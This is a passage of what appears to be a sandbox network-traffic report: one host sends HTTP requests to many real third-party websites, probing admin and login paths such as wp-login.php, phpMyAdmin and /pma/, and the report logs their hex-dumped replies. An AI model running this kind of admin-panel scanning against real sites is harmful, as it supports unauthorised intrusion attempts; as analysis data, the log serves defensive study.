75 b3 8e 7c e3 a6 8b aa 2e eb 79 e1 da b3 51 3f e8 5e 7d 7e aa 9c 7e d2 41 f5 27 93 7b 2f 92 d7 f7 7b 7f 9b 03 b4 9f 39 bc 9d 36 c5 aa 23 de 0a e3 28 5b ad ca 62 9a 75 45 5d 8d ca fc b7 3f b4 75 05 84 32 6b db 71 14 ee 02 df 2e dc 32 8b e7 4d b6 5a 44 cf df 44 ff 33 e0 5f 77 d1 e9 ce ad 7d 89 f7 6b 74 12 fd cf be f2 f4 5b 94 06 bb 9d 46 7f 75 97 af bc cd 90 2c f2 83 be 0d 18 76 07 04 83 07 7e b3 35 e5 49 b4 6e ca 8f 55 a3 2a a8 72 fa d3 d5 38 89 72 d7 6b 81 e5 31 e0 65 7d 59 94 8e 7c b1 5a dd 37 02 e5 ab da eb 5e 64 e5 17 d3 be e5 60 c5 57 2e 6b a6 8b 21 71 12 75 59 33 77 90 68 5f f0 75 d5 35 37 7f aa 8b aa eb 17 fb c6 2d 57 65 d6 b9 8f 2d f8 79 3b 7e d3 86 e1 df 77 ae 59 7e df 76 4d 51 cd df 46 6f 4f a2 bf af 5d 73 13 17 d5 6a ed 8f d1 b8 bf af 8b c6 e5 c4 eb 31 7e b7 25 7a fb dd 49 54 54 e7 59 35 5f c3 a6 e8 70 55 0c 6f bf fd ee ed d9 a8 d7 c1 bb e3 49 1c 93 11 f9 3f fe f4 e4 d5 d7 7f 24 ab 72 3d 2f aa 84 c4 f1 f3 c7 8f 1f 9f 95 45 f5 23 69 5c 09 e7 94 18 5e f9 0d ee b1 52 d3 b6 bf bd 5e 96 48 15 5d e9 7e ba 55 c9 67 4d f6 f7 75 fd 8c fc ce b9 3c 22 8b c6 cd c6 1f d6 69 86 c2 51 70 f8 bf 9c 23 6a 7c 6d fb 70 b2 d3 a1 e3 90 f5 f6 04 9b a2 ca eb 4d f2 fd 66 e5 96 f5 0f c5 2b d7 75 b8 5e 4b c6 e4 4d 74 99 b5 ee 2f 4d b9 f3 cc df 46 7f 1b b5 c9 26 a9 9b f9 df 46 c5 Data Ascii: 1faav-[zrE~!uv>efo9`6h6Ec8w/($Jus5Y]QWdZfm;YM=PAgyqE\|.xZW]VT$y=nV,e2U_^Eet5_]l{-C\MwqCpBiV1S4GqqU{:yR716hYGr!_w;,=mkVuQly;hC[bYdSt-?uv$r=/rYbILdZ/GWkQ_ZWJO@d]uq+wz_2!$u\|.yQ?^}~~A'{/{96#([buE]?u2kq.2MZDD3_w}kt[Fu,v~5InU*r8rk1e}Y\|Z7^d`W.k!quY3wh_u57-We-y;~wY~vMQFoO]sj1~%zITTY5_pUoI?$r=/E#i\^R^H]~UgMu<"iQp#j\|mpMf+u^KMt/MF&F
Feb 21, 2024 00:26:13.655699968 CET	1286	IN	Data Raw: 12 67 6d ff 86 e1 8d fb db 28 34 ff 6d c4 64 42 13 fa b7 91 e1 d7 86 ff 6d 04 ef b9 6b ef 96 64 05 47 9c 44 ed d5 fc e7 cd 43 63 98 86 df af fb 81 f8 f2 71 bd 6e a6 ce 1b 7f 5a 57 10 3a b4 0d f3 c3 f8 fb f4 c0 eb 0a 3e 9e 96 eb dc 03 fe d0 86 87 Data Ascii: gm(4mdBmkdGDCcqnZW:>['K+u"}oEKfE~uWsW9'u5>*N7WYC=;~57!no\+mW\|\eqvtYc^uuuGz?$mz;>~
Feb 21, 2024 00:26:13.655894041 CET	1286	IN	Data Raw: 99 cd 71 b8 71 e7 ad 7b 5f c7 d7 d7 53 b7 ea 7e 87 b2 fb 27 ee f3 77 66 1f 3f fb e4 79 4f 0e 2a 3c 51 6c fa d5 1f 5f fe d9 65 f9 cd f8 09 43 d4 f8 cf 49 56 96 97 d9 f4 c7 fd 19 8e df 1c 16 d2 b7 ef c8 7a fc 66 38 a5 bb 27 15 4c 7b 3f f9 7f fe f3 Data Ascii: qq{_S~'wf?yO*<Ql_eCIVzf8'L{?(z&NGv=wG0>>uf>?%f<uC:3MQ$!~(\|gF?>k"?P6.\<m?~T,eQPN<~(/U<)^!{
Feb 21, 2024 00:26:13.655950069 CET	1286	IN	Data Raw: 0e 99 1d d1 13 32 fc 3f e1 77 af b8 ed ce 9d 5b 61 13 e8 d9 ff 51 f4 9e 6e f9 be 6e fc 36 ab 3d f2 7d bd ef 45 ae d7 9d 77 65 7e bb 3d 16 db 19 5c a9 13 b2 ff c3 8e 4f 76 85 b7 31 d8 fb 10 a6 4d d1 7e 90 1d 3a df 9e 6e 16 ae 71 47 49 d1 c2 5c 37 Data Ascii: 2?w[aQnn6=}Ewe~=\Ov1M~:nqGI\7 Jw}fItf:!$YY7xS-K] C<ob7=?uU7CgJuW'rU7]VwO_W>_^P~u;Vuw sf<>x
Feb 21, 2024 00:26:13.656007051 CET	1286	IN	Data Raw: 9b 82 67 dd 2c 63 13 4f db f6 29 59 34 6e 36 7e ba e8 ba d5 e9 68 b4 71 b3 ae 73 d3 45 05 d5 e7 85 6b 93 69 bd 1c 81 90 6f c4 59 46 ab 72 3d 2f aa 76 74 7b d0 a8 a8 a6 e5 3a 77 78 6f db 9e 06 3a db f6 f3 2b d7 8c 55 62 12 95 b0 a7 c4 3b 37 1b 3f Data Ascii: g,cO)Y4n6~hqsEkioYFr=/vt{:wxo:+Ub;7?)}fu9]o\jB'^W]s5;Kd-p,jNd"~*l/d~J7U6v}]7q0dqmG?#?3n\rqyk_yV?}06\|pK
Feb 21, 2024 00:26:13.656173944 CET	1286	IN	Data Raw: db d5 cb b8 07 c4 5e ff 02 c8 76 55 16 5d 57 54 f3 7f 25 56 3c 75 65 d9 fe 2b 10 f7 7e fd 55 71 1a d7 ae e0 d5 e2 ca c5 08 0f 00 7b d7 8e 46 1f f2 ed e0 ec ff ae eb 39 d2 df 64 73 f2 32 ab b2 b9 6b 42 fa ac 9d 36 c5 aa 7b 7e 34 5b 57 53 df 74 b4 Data Ascii: ^vU]WT%V<ue+~Uq{F9ds2kB6{~4[WSt9O8~n~$u8zt-c\|t]M2gWYCf\|]bk?do<i0k(A$/<5O?Y9~g?$Y{SM]vf:~+z7d
Feb 21, 2024 00:26:13.656212091 CET	796	IN	Data Raw: 49 94 29 7f 27 2c 09 36 42 e2 59 61 c9 94 1a bf a4 31 d4 4e 64 ea 59 86 a5 a0 25 c6 80 bd 54 e1 ae c6 32 eb 63 4e b1 0d b7 89 b2 92 4d b6 79 18 59 a8 94 f9 bc b5 da 7a 47 e3 80 2a cc d7 42 12 ef 6c ca ec c4 e3 2b cb 09 d3 c1 c8 c4 d3 b3 c0 81 9f Data Ascii: I)',6BYa1NdY%T2cNMyYzG*Bl+}P51o0SA6@>ynhVJ~\[)gMP1o)DXYb6xGL%PSk;VP66A9nlq;aX%1^ML\|QE"T>VBx
Feb 21, 2024 00:26:13.656331062 CET	1286	IN	Data Raw: 31 66 61 30 0d 0a ec 0b 5f a6 25 b8 e1 97 29 e2 9f a5 f5 c3 71 ce db 21 38 93 a1 6b e2 b1 65 ca fa 58 32 e4 01 23 a4 8f 79 2a 55 88 61 2c 1f 53 93 ea 89 e7 0e 1f 78 a5 50 66 c3 2e cc e7 41 39 f5 52 40 63 2c 49 04 7c ca 95 df 1d 67 55 21 86 a1 75 Data Ascii: 1fa0_%)q!8keX2#y*Ua,SxPf.A9R@c,I\|gU!us02HcbOr?(q6Dg~Lm.cM]ed-/5br=?I%$]oMqB/2r>?a;I]^7-r
Feb 21, 2024 00:26:13.656413078 CET	1286	IN	Data Raw: 62 a6 e8 f6 31 c6 63 44 f2 ac cb e2 ae e8 4a 37 8e be 6a 8a 2b 6f 96 ff 6e ea 4d b7 88 1e b8 ef 4f 3a 43 de 43 c4 f3 00 31 8a b6 dc cb a2 ed 5e 38 10 7a 7e 9b 84 97 ff 61 34 1e a2 fa ae f8 27 db e7 2e ef e7 93 ba ea 60 0f f2 aa 6b b2 ce cd 6f 7e Data Ascii: b1cDJ7j+onMO:CC1^8z~a4'.`ko~?u^MV^:pvt}Ee+yF(/PuXyI\jWY<+_X$fm*{@OyH_a7yIv?Nn\|t
Feb 21, 2024 00:26:13.656486034 CET	1286	IN	Data Raw: 22 d7 cb b2 6a c7 d1 a2 eb 56 a7 a3 d1 66 b3 49 36 22 a9 9b f9 88 53 4a fd 0e 77 b0 1e 9d ad b2 6e 41 f2 71 f4 52 26 fe 96 90 c6 5e a8 c4 2a 25 e5 0b 5c 9a 1b a9 cd 05 b3 2f 86 f4 eb 97 3c 61 ca 70 4e 64 c2 52 2d 60 2d 45 51 34 84 f8 11 12 31 2c Data Ascii: "jVfI6"SJwnAqR&^*%\/<apNdR-`-EQ41,}Z&:TkcI-;j24qfjhon'zV&0b_UhbXK/B-epg&wU2Id<<KIV61J+x#++i0[C>e/I
Feb 21, 2024 00:26:13.828692913 CET	1286	IN	Data Raw: 05 81 74 5f c7 44 df 07 d7 ec e7 60 2e bc b9 3d 43 00 b6 d4 06 26 29 0a 7a 6a da db ce 42 2c 3d 90 e7 61 19 cf 28 6c 67 95 1c d6 b5 fd fe fe 96 5e 10 e4 f6 0f bd 64 76 b2 7b 08 a2 8a 5e e5 30 23 c8 6e f6 20 e1 2e 2a 9d ec 58 84 cb c1 7f 3b 9e e1 Data Ascii: t_D`.=C&)zjB,=a(lg^dv{^0#n .*X;l?goNUlb:SjClSAI\|,H 5'^w!VI]We;Uv{QMd/Jw(\|XL,4:9jbjjb~o

Session ID	Source IP	Source Port	Destination IP	Destination Port
350	192.168.2.6	63292	103.224.182.253	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:13.465311050 CET	168	OUT	GET /admin HTTP/1.1 Host: hotmail.fr.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:13.625763893 CET	241	IN	HTTP/1.1 429 Too Many Requests content-length: 117 cache-control: no-cache content-type: text/html connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 32 39 20 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3c 2f 68 31 3e 0a 59 6f 75 20 68 61 76 65 20 73 65 6e 74 20 74 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 20 69 6e 20 61 20 67 69 76 65 6e 20 61 6d 6f 75 6e 74 20 6f 66 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>429 Too Many Requests</h1>You have sent too many requests in a given amount of time.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
351	192.168.2.6	63439	13.248.169.48	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:13.491024017 CET	173	OUT	GET /admin.php HTTP/1.1 Host: acidvision.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:13.615653992 CET	223	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Tue, 20 Feb 2024 23:26:13 GMT Content-Type: text/plain Content-Length: 0 Connection: keep-alive Location: https://acidvision.com/admin.php ETag: "65d0dd59-0"

Session ID	Source IP	Source Port	Destination IP	Destination Port
352	192.168.2.6	63438	15.197.142.173	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:13.497601986 CET	181	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: veselcontractors.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:13.594466925 CET	365	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:13 GMT Content-Type: text/html; charset=utf-8 Content-Length: 125 Connection: keep-alive Server: ip-10-123-122-167.ec2.internal X-Request-Id: 34bc903a-17a7-4ebc-8ccc-48a2ff1b9659 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title> Not Found </title></head><body>HTTP Status: 404 (not found)</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
353	192.168.2.6	63343	213.186.33.5	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:13.507153988 CET	177	OUT	GET /wp-login.php HTTP/1.1 Host: pharmacie-vp.fr Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:13.672700882 CET	458	IN	HTTP/1.1 302 Moved Temporarily server: nginx date: Tue, 20 Feb 2024 23:26:13 GMT content-type: text/html content-length: 138 location: http://imp.ovh.net x-iplb-request-id: BF60E3DE:F76F_D5BA2105:0050_65D53515_7A9771A:3515 x-iplb-instance: 52345 set-cookie: SERVERID77446=200175\|ZdU1G\|ZdU1G; path=/; HttpOnly Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>
Feb 21, 2024 00:26:16.783449888 CET	254	OUT	GET /wp-admin/ HTTP/1.1 Host: pharmacie-vp.fr Accept: / Accept-Encoding: deflate, gzip Cookie: SERVERID77446=200175\|ZdU1G\|ZdU1G User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://www.ovh.co.uk/mail/
Feb 21, 2024 00:26:16.950434923 CET	394	IN	HTTP/1.1 302 Moved Temporarily server: nginx date: Tue, 20 Feb 2024 23:26:16 GMT content-type: text/html content-length: 138 location: http://imp.ovh.net x-iplb-request-id: BF60E3DE:F76F_D5BA2105:0050_65D53518_7A97D7E:3515 x-iplb-instance: 52345 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
354	192.168.2.6	63505	3.33.130.190	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:13.514576912 CET	172	OUT	GET /admin.php HTTP/1.1 Host: blauthlaw.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:13.608602047 CET	222	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Tue, 20 Feb 2024 23:26:13 GMT Content-Type: text/plain Content-Length: 0 Connection: keep-alive Location: https://blauthlaw.com/admin.php ETag: "65d0dd59-0"

Session ID	Source IP	Source Port	Destination IP	Destination Port
355	192.168.2.6	63378	162.0.235.125	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:13.517952919 CET	183	OUT	GET /wp-login.php HTTP/1.1 Host: norwegischlernen.info Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:13.680294037 CET	1048	IN	HTTP/1.1 301 Moved Permanently keep-alive: timeout=5, max=100 content-type: text/html content-length: 795 date: Tue, 20 Feb 2024 23:26:13 GMT server: LiteSpeed location: https://norwegischlernen.info/wp-login.php x-turbo-charged-by: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
356	192.168.2.6	63342	217.160.122.119	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:13.546639919 CET	178	OUT	GET /wp-login.php HTTP/1.1 Host: netzschnipsel.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:25.049870014 CET	1286	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=15 Date: Tue, 20 Feb 2024 23:26:24 GMT Server: Apache X-Powered-By: PHP/7.3.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Frame-Options: SAMEORIGIN Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/ Content-Encoding: gzip Data Raw: 34 62 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 bd 56 c1 6e dc 36 10 3d 5b 5f 41 ab 88 b5 06 ac 95 37 6d d0 24 96 d6 88 63 17 c8 21 8d 81 ba 28 da c0 30 28 72 76 c5 9a 22 15 92 5a 79 1d f8 cf 7a eb 8f 75 48 49 b6 8c a6 ad db 43 2f 2b 71 38 1c bd 79 33 6f b8 f9 ee e9 87 b7 17 3f 9f 9f 91 ca d5 72 19 ed e4 bb 69 fa 51 ac c8 bb 33 f2 f2 12 d7 3b b9 df 20 37 b5 54 b6 88 2b e7 9a d7 59 d6 75 dd bc fb 7a ae cd 3a 5b bc 7a f5 2a bb f1 3e 31 61 92 5a 74 12 f0 32 26 92 aa 75 11 73 48 4f cf e2 fe f4 eb 55 79 1f 40 af 9b 79 0d 99 b2 d9 aa fc 6a dc a7 9c bb 4a 3c fe ca 60 9b 33 5d 67 15 c8 26 a3 8d 48 6d 03 2c 26 01 ec 47 50 5c ac 2e d3 74 02 7d 77 e6 c1 ef 93 cb a5 4f e6 5f e6 f0 3f e1 4e d3 7c f7 11 f6 0a 28 f7 39 d4 e0 28 d6 c2 35 29 7c 6a c5 a6 88 df 6a e5 40 b9 f4 62 db 00 52 dc af 8a d8 c1 8d cb 3c ed 47 84 55 d4 58 70 c5 8f 17 df a5 c8 7c e6 c3 38 e1 24 2c bf 07 77 6b 59 a5 44 63 41 12 0e 86 fc a0 99 a0 92 bc 07 2e 28 39 91 7a 4d f6 a4 a5 9f 5a 7d 44 de a8 1a 24 07 95 67 fd 61 8c 22 85 ba 26 06 64 91 70 65 d3 c6 c0 0a 1c ab 12 52 e1 5b 91 64 99 9d 77 be 09 12 ff cd 89 b3 75 5b 09 b6 02 70 a3 eb a4 6f d4 14 d3 9c 43 d6 35 29 e5 b5 50 99 d4 94 a7 fd d9 79 53 35 c7 ac 58 ec d1 ba 39 e2 c2 14 d2 99 f0 ee 7d 9e bd 38 79 f6 e2 b4 e0 d4 56 02 f9 b0 07 65 eb 9c 7f ae b4 a9 ed 81 5c 1c aa 03 cc 4c a8 70 62 03 a6 f8 66 fe ed fc f9 cb 84 38 e4 b0 48 02 75 cc da 84 d4 9e 86 22 a1 52 86 14 06 f6 15 ad d1 cb e8 52 3b f4 19 19 4f 94 16 8a c3 cd 81 d2 d4 b0 4a 6c e0 0b 67 90 20 63 c0 4c 4e 59 67 04 73 a9 36 02 01 a5 5d 05 2a 65 46 5b 3b 58 fa 18 d3 0f c7 1b 01 5d a3 8d 9b 14 bb 13 a8 8c 82 c3 46 30 48 c3 a2 2f f3 4e 8e a2 e8 fb a6 d4 7c 3b 0a 30 24 4f c2 6f 4a 99 13 5a a5 bd 09 a9 66 da 40 da 0a 82 db 8c 4a 48 51 a1 1c e2 20 12 2e 36 44 f0 22 0e be bd a9 5a 2c 73 6c 47 5f ee a0 7d 8b e2 e7 30 ef b4 e1 d8 0d d6 86 11 10 93 d0 30 45 7c ae 3b 30 c0 49 b9 25 3f a1 c7 b9 f7 c0 4d 5a 06 e2 8a 38 5d c4 4f 69 c9 3c a3 4b 4c 6c 81 a0 a2 dc d7 94 84 8a f4 b8 fc 3a 7e 80 d9 2f fb 24 ef a7 8b 1f 4f 5f 6a b3 90 98 6f ad 18 2b ef 2a 8d b9 36 da 3a 9f 6a de 04 0a 24 2d 51 28 18 b4 88 5b 0b e6 6a a0 e2 04 54 eb 6e c1 78 1c 44 7b 1d 9d a5 ef a9 90 e9 1b ee 73 84 bc 34 41 76 3b b9 50 4d eb fa 3e 0b 12 8d 1f b0 f7 a8 27 61 c7 72 85 33 31 d9 50 d9 42 11 c7 c4 8a 5b 7c 3e 3f f4 35 ce b3 00 c9 23 cc 3c c4 bf c0 d9 e0 e0 8d 97 e7 f8 8b a5 71 5f 86 e3 7d 7c e1 46 48 4d 87 af be de 01 52 88 f0 5f 10 21 a4 f1 18 f2 b6 06 57 83 d2 c8 69 3e e1 d2 40 0d 75 09 a6 c6 4e 1b 28 ea 4b 3a d9 18 48 63 15 b0 eb 52 df f4 d0 a6 fb 03 3f f8 11 40 4d c7 04 d9 c1 99 b5 c6 d0 38 b5 1c 29 25 88 d2 4f af 9e b0 91 ae 11 9b Data Ascii: 4b2Vn6=[_A7m$c!(0(rv"ZyzuHIC/+q8y3o?riQ3; 7T+Yuz:[z>1aZt2&usHOUy@yjJ<`3]g&Hm,&GP\.t}wO_?N\|(9(5)\|jj@bR<GUXp\|8$,wkYDcA.(9zMZ}D$ga"&dpeR[dwu[poC5)PyS5X9}8yVe\Lpbf8Hu"RR;OJlg cLNYgs6]eF[;X]F0H/N\|;0$OoJZf@JHQ .6D"Z,slG_}00E\|;0I%?MZ8]Oi<KLl:~/$O_jo+*6:j$-Q([jTnxD{s4Av;PM>'ar31PB[\|>?5#<q_}\|FHMR_!Wi>@uN(K:HcR?@M8)%O
Feb 21, 2024 00:26:25.049884081 CET	347	IN	Data Raw: 6d cb 5a 84 52 3f 2e d2 60 1f ca 84 02 19 0d 9e 99 c9 72 b8 db fa 51 43 fa 07 4e 44 51 53 b3 1d 97 92 62 fe f7 85 1c e7 e9 28 d5 69 6b 54 82 e3 a4 1d 2b 81 9a 11 06 98 bb 72 fa fe f4 93 26 e6 3f 87 76 60 1d d3 fa 5a 3c e0 5a f4 a7 02 41 79 e6 05 Data Ascii: mZR?.`rQCNDQSb(ikT+r&?v`Z<ZAy",OXMPT}:(QN}v:Q^Qt[fD3K+(Vtu]4klsAnFFGg#N;#$6r'w\|<0?\|_*\|Gn[X"E

Session ID	Source IP	Source Port	Destination IP	Destination Port
357	192.168.2.6	63383	162.241.216.197	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:13.546639919 CET	179	OUT	GET /pma/ HTTP/1.1 Host: wilsonfamilyinsurance.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:13.900928974 CET	1286	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:13 GMT Server: nginx/1.21.6 Content-Type: text/html; charset=UTF-8 Content-Length: 7939 Pragma: no-cache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://wilsonfamilyinsurance.com/wp-json/>; rel="https://api.w.org/" Vary: Accept-Encoding Content-Encoding: gzip host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== X-Endurance-Cache-Level: 2 Set-Cookie: PHPSESSID=acf8463445dc8fdfa0358960121e753c; path=/ Data Raw: 1f 8b 08 00 00 00 00 00 00 03 c5 72 6b 73 db b6 d6 f5 e7 78 a6 ff 01 66 a6 b1 d4 0a a4 6e be c9 a6 fb e4 a4 c9 79 72 a6 a7 e9 d3 a4 d3 f7 4c 92 c9 40 e4 26 09 1b 04 58 00 d4 a5 ae ff fb bb 41 5d 2c cb 94 ec c4 4e 8f e2 48 24 b0 f7 5a 6b af bd be d9 f9 66 e7 74 f7 c7 37 2f de fd e7 97 97 24 b3 b9 38 c3 03 f7 4b 04 93 69 e8 81 a4 bf bd f5 aa 43 60 b1 fb cd c1 32 12 65 4c 1b b0 a1 f7 db bb 57 f4 